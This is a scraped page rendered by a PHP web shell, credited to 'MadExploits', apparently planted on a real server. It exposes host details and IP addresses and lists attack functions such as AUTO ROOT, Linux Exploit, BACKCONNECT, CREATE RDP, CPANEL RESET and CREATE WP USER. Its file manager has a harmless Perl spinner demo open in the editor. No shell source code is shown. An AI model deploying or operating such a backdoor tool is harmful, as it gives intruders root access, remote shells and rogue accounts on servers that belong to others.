Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-Term-Spinner-Color /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
AllFramesDemo.pm
734
B
-rw-r--r--
Examples.pm
1.12
KB
-rw-r--r--
test-spinner.sh
111
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AllFramesDemo.pm
#!/usr/bin/env perl package Term::Spinner::Color::AllFramesDemo; use 5.010.001; use lib "../lib"; use Term::Spinner::Color; use Time::HiRes qw( sleep ); use utf8; sub main { my $s = Term::Spinner::Color->new(); my @colors = $s->available_colors(); for my $frame (keys %{$s->available_frames()}) { print "\033[2J"; #clear the screen print "\033[0;0H"; #jump to 0,0 print $color; my $loopspin = Term::Spinner::Color->new('seq' => $frame, 'color' => $colors[0],); my $cols = (30 - length($frame)) - $loopspin->frame_length(); print "$frame" . " " x $cols; $loopspin->auto_start(); sleep 5; $loopspin->auto_done(); push @colors, shift @colors; } } exit main(\@ARGV);
Close